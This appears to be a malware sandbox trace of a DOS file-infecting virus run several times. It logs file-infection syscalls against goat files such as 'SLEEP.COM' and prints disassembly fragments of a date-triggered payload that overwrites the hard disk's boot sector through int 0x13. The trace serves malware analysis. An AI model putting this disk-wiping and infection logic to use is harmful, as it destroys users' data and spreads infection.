2018-12-25T11:52:09.278259909Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.285529619Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.286929161Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.293083904Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.309507829Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.311289779Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.31419507Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.320599214Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.329948722Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.341361431Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.343263798Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.349742896Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.362569194Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.365480397Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.368133825Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.373888634Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.384384379Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.39158374Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.393251917Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.400038856Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.413750224Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.415805855Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.418668546Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.425599102Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.435442599Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.442224904Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.444898247Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.45178741Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.461816351Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.464618003Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.467824418Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.474367105Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.484896511Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.49203737Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.493695576Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.500389323Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.511157798Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.513200734Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.516049103Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.522956433Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.532780246Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.540234267Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.543038876Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.54966732Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.559773356Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.562899394Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.565720289Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.571528389Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.582110999Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.589269777Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.590931844Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.59845602Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:09.600840169Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:09.603489104Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:09.605815808Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:09.607707576Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.614530168Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:09.616310855Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:09.625655268Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:09.627278848Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:09.630246855Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:09.632839063Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:09.63455829Z 62 PC: 1448c | Close file
2018-12-25T11:52:09.642401242Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:09.651235904Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.655079242Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.656366919Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.663691403Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:09.680203519Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:09.681371814Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:09.688673066Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:09.690969884Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:09.695305433Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":15,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:08.829645214Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:08.831406513Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:08.833437093Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.83544879Z 9 PC: 14320 | Display string (Could not find end pointer)
2018-12-25T11:52:08.959000905Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.961036278Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.967486332Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.973835471Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:09.229691363Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:09.236702412Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:09.238693235Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.24536433Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:09.256006103Z 62 PC: 143b9 | Close file
2018-12-25T11:52:09.259131152Z 79 PC: 143bd | Find next file
2018-12-25T11:52:09.262332162Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.268328358Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.279183535Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.289659038Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.290980186Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.297465484Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.308474108Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.310245219Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.314721203Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.320825959Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.330680175Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.342335052Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.344202828Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.348690482Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.362438654Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.36502067Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.367817827Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.373917234Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.384372258Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.390250865Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.395426748Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.403206755Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.415835812Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.417884218Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.421896559Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.427771435Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.437659682Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.445286853Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.44752097Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.453979791Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.464783274Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.467275249Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.470133009Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.482896763Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.493152818Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.499949994Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.501855125Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.509284295Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.519581133Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.521653945Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.525673248Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.531512084Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.544306635Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.552308299Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.554034832Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.561536954Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.572947378Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.575070112Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.577904294Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.599601329Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.619765413Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.628028547Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.630766318Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.637486676Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:09.638786082Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:09.641837965Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:09.643128143Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:09.644429228Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.651847484Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:09.653916863Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:09.662325394Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:09.663619718Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:09.66682372Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:09.668479357Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:09.670715281Z 62 PC: 1448c | Close file
2018-12-25T11:52:09.679122829Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:09.689214859Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.694176211Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.697143883Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.699593224Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:09.704756102Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:09.707453581Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:09.721712846Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:09.723072424Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:09.726077364Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":15,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:09.047439303Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:09.048999137Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:09.051055089Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:09.053356851Z 9 PC: 14320 | Display string (Could not find end pointer)
2018-12-25T11:52:09.154127091Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:09.156802Z 78 PC: 14390 | Find first file
2018-12-25T11:52:09.163035977Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:09.169551224Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:09.230466544Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:09.237802616Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:09.246664252Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.253251798Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:09.270804392Z 62 PC: 143b9 | Close file
2018-12-25T11:52:09.274066085Z 79 PC: 143bd | Find next file
2018-12-25T11:52:09.276635572Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.282189245Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.292722408Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.299546612Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.300955041Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.307833535Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.319377797Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.335141862Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.33869149Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.344390186Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.354245053Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.361937495Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.363818294Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.370365353Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.380936085Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.384493549Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.387738328Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.394337352Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.404853304Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.411273287Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.41285749Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.420747541Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.433183567Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.435143005Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.438224552Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.444866293Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.454340417Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.461041474Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.462306588Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.468573462Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.478504982Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.480211989Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.48293588Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.489274838Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.498807264Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.505856896Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.50762847Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.513799167Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.525715567Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.52767007Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.530100965Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.537165428Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.548351962Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.554850808Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.556445722Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.564013773Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.574577792Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.576519622Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.580323921Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.586660191Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.596538697Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.604189955Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.60598187Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.608319436Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:09.610094798Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:09.613016276Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:09.614581391Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:09.616923157Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.620827291Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:09.622653315Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:09.635072755Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:09.637025694Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:09.640007715Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:09.642381553Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:09.644463761Z 62 PC: 1448c | Close file
2018-12-25T11:52:09.652263987Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:09.662355751Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.668222689Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.669959746Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.67263863Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:09.679332417Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:09.680784791Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:09.687476849Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:09.690743468Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:09.695388535Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":15,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:09.18746564Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:09.192134231Z 44 PC: 14304 | Get time
0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:09.194084904Z 44 PC: 14314 | Get time
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:09.196075356Z 9 PC: 14320 | Display string (Could not find end pointer)
2018-12-25T11:52:09.314173012Z 42 PC: 14324 | Get date
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:09.316905004Z 78 PC: 14390 | Find first file
2018-12-25T11:52:09.32305401Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:09.329786705Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:09.363444496Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:09.370801976Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:09.372924851Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.379650513Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:09.389378054Z 62 PC: 143b9 | Close file
2018-12-25T11:52:09.391035597Z 79 PC: 143bd | Find next file
2018-12-25T11:52:09.3930489Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.397629723Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.407552868Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.414284798Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.415895141Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.422631871Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.433025172Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.435075054Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.437885782Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.444880496Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.454778228Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.466106448Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.468152731Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.474685763Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.484594737Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.487167166Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.489776166Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.495277947Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.505764131Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.512456375Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.514035853Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.521049971Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.533478526Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.535553697Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.5391946Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.545175814Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.557094249Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.565345663Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.5672175Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.573256432Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.583712163Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.58606197Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.588985322Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.600192069Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.610630944Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.61563939Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.617335519Z 63 PC: 143ea | Read file or device (See above)
